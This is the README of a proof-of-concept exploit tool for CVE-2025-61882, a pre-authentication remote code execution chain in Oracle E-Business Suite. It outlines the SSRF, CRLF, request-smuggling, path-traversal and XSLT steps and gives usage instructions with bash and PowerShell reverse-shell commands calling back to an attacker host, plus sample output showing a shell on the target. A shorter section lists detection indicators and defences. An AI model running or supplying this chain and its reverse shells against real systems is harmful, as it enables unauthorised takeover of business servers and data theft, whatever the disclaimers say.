POC of CVE-2025-61882 # CVE-2025-61882 Security Testing Tool
## 🚨 CRITICAL LEGAL WARNING
See our [blog post](https://blog.intelligencex.org/cve-2025-61882-oracle-zero-day-exploit-analysis) for technical details
**THIS TOOL IS FOR AUTHORIZED SECURITY TESTING ONLY**
```
╔══════════════════════════════════════════════════════════════╗
║ ║
║ 🚨 UNAUTHORIZED ACCESS TO COMPUTER SYSTEMS IS ILLEGAL 🚨 ║
║ ║
║ By using this tool, you acknowledge and agree that: ║
║ ║
║ ✓ You have WRITTEN AUTHORIZATION to test the target ║
║ ✓ You accept FULL LEGAL RESPONSIBILITY for your actions ║
║ ✓ You will COMPLY with all applicable laws ║
║ ✓ Unauthorized use may result in IMPRISONMENT ║
║ ║
║ If you DO NOT have authorization: EXIT NOW ║
║ ║
╚══════════════════════════════════════════════════════════════╝
```
**Penalties for unauthorized use include:**
- Criminal prosecution under CFAA (US), Computer Misuse Act (UK), and equivalent laws
- Civil lawsuits for damages
- Substantial fines (up to $250,000+ in the US)
- Imprisonment (up to 10+ years depending on jurisdiction)
- Permanent criminal record
---
## 📋 Overview
Security testing tool for **CVE-2025-61882**, a critical pre-authentication remote code execution vulnerability affecting Oracle E-Business Suite.
**Created by:** Mindflare
**Purpose:** Authorized security testing and vulnerability validation
**Blog:** [Read the full technical analysis](#)
### Vulnerability Details
- **CVE ID:** CVE-2025-61882
- **CVSS Score:** 9.8 (Critical)
- **Attack Vector:** Network (Unauthenticated)
- **Attack Complexity:** Medium
- **Privileges Required:** None
- **User Interaction:** None
- **Affected Versions:** Oracle E-Business Suite 12.2.3 - 12.2.14
- **Patch Status:** Emergency patch released October 4, 2025
- **Exploitation Status:** ⚠️ **ACTIVELY EXPLOITED** by Cl0p ransomware since August 2025
### Technical Summary
CVE-2025-61882 is a sophisticated exploit chain combining five distinct vulnerabilities:
1. **SSRF** - Server-Side Request Forgery via `/OA_HTML/configurator/UiServlet`
2. **CRLF Injection** - HTTP header injection in `return_url` parameter
3. **HTTP Smuggling** - Keep-alive connection abuse to reach internal services (port 7201)
4. **Authentication Bypass** - Path traversal via `/OA_HTML/help/../` prefix
5. **XSLT Injection** - Malicious XSL template processing leads to RCE
---
## 🎯 Intended Use Cases
### ✅ Acceptable Use
- Authorized penetration testing with written permission
- Security research on systems you own
- Vulnerability validation in controlled lab environments
- Red team exercises with proper scope documentation
- Academic research with institutional approval
- Incident response and forensic analysis
### ❌ Prohibited Use
- Any unauthorized system access
- Testing systems without explicit written permission
- Malicious activities or causing harm
- Attacking production systems without approval
- Using for criminal purposes
- Any activity violating applicable laws
---
## 📦 Installation
### Prerequisites
- Python 3.7 or higher
- pip package manager
- Network connectivity to target (authorized only)
- Netcat or similar listener for receiving reverse shell
### Setup
```bash
# Clone the repository
git clone https://github.com/[YOUR-USERNAME]/CVE-2025-61882-POC
cd CVE-2025-61882-POC
# Install dependencies
pip3 install -r requirements.txt
# Make script executable (Linux/Mac)
chmod +x cve-2025-61882-detector.py
```
---
## 🚀 Usage
### Step 1: Set Up Your Listener
In a **separate terminal**, start a netcat listener:
```bash
# Linux/Mac
nc -lvnp 4444
# Windows
nc.exe -lvnp 4444
```
### Step 2: Run the Tool
**Basic Usage (Linux Target):**
```bash
python3 cve-2025-61882-detector.py \
--target http://192.168.1.22:8000 \
--lhost 192.168.1.10 \
--lport 80 \
--command 'bash -i >& /dev/tcp/192.168.1.10/4444 0>&1' \
--platform linux
```
**Windows Target:**
```bash
python3 cve-2025-61882-detector.py \
--target http://192.168.1.22:8000 \
--lhost 192.168.1.10 \
--lport 80 \
--command 'powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient(\"192.168.1.10\",4444)"' \
--platform windows
```
### Parameters
| Parameter | Description | Required | Example |
|-----------|-------------|----------|---------|
| `--target` | Target Oracle EBS URL | **Yes** | `http://192.168.1.22:8000` |
| `--lhost` | Your IP address (for callbacks) | **Yes** | `192.168.1.10` |
| `--lport` | HTTP server port (serves XSL payload) | **Yes** | `80` or `8080` |
| `--command` | Command to execute on target | **Yes** | See examples above |
| `--platform` | Target OS: `linux` or `windows` | **Yes** | `linux` |
---
## 📊 Example Output
### Tool Output
```
[*] Target URL: http://192.168.1.22:8000
[*] Listener IP: 192.168.1.10
[*] Listener Port: 80
[*] Platform: linux
[*] HTTP server started on 192.168.1.10:80
[*] Connecting to target to retrieve CSRF token...
[*] CSRF TOKEN: WLDW-GNFH-MB4K-76EA-JB48-VY3X-L30R-NZT0
[*] Cooking HTTP smuggle stub...
[*] Sending exploit payload...
[*] Exploit payload sent successfully
[+] 192.168.1.22 - GET /OA_HTML/help/../ieshostedsurvey.xsl HTTP/1.1
[+] XSL payload served successfully
```
### Netcat Listener Output (If Vulnerable)
```bash
ubuntu@attacker:~$ nc -lvnp 4444
Listening on 0.0.0.0 4444
Connection received on 192.168.1.22 30290
bash: no job control in this shell
[oracle@apps EBS_domain]$ id
uid=54321(oracle) gid=54321(oinstall) groups=54321(oinstall)
[oracle@apps EBS_domain]$
```
---
## 🛡️ Detection & Defense
### For Security Defenders
#### Immediate Actions
1. **Apply Oracle Emergency Patch** (Document ID: 30061882.1)
2. **Hunt for Compromise:**
```sql
SELECT * FROM XDO_TEMPLATES_B
WHERE TEMPLATE_CODE LIKE 'TMP%' OR TEMPLATE_CODE LIKE 'DEF%';
```
3. **Review Access Logs** since August 2025
4. **Block outbound internet** from EBS servers
#### Detection Indicators
**Network IOCs:**
```
200.107.207.26 (Cl0p C2)
161.97.99.49 (Secondary)
```
**HTTP Patterns:**
- `POST /OA_HTML/configurator/UiServlet`
- `POST /OA_HTML/SyncServlet`
- `GET /OA_HTML/help/../*.jsp`
- CRLF characters in parameters
---
## 📚 References
- [Oracle Security Alert Advisory](https://www.oracle.com/security-alerts/alert-cve-2025-61882.html)
- [CISA KEV Catalog](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)
- [Google/Mandiant Analysis](https://cloud.google.com/blog/topics/threat-intelligence/oracle-ebusiness-suite-zero-day-exploitation)
- [watchTowr Labs Research](https://labs.watchtowr.com/)
---
## 📜 License
MIT License with Educational Use Restrictions - See [LICENSE](LICENSE)
**DISCLAIMER:** This software is for authorized security testing only. Unauthorized access to computer systems is illegal. The author assumes no liability for misuse.
---
## 🔐 Final Warning
```
╔══════════════════════════════════════════════════════════════╗
║ WITH GREAT POWER COMES GREAT RESPONSIBILITY ║
║ ║
║ 🔒 Stay Legal. Stay Ethical. Stay Professional. 🔒 ║
╚══════════════════════════════════════════════════════════════╝
```
**Created by:** Mindflare | **Last Updated:** October 2025
[4.0K] /data/pocs/b44c677f98bbc893a9ac05d86ba357970a963179
├── [ 14K] cve-2025-61882-detector.py
├── [2.5K] LICENSE
├── [8.3K] README.md
└── [ 32] requirements.txt
1 directory, 4 files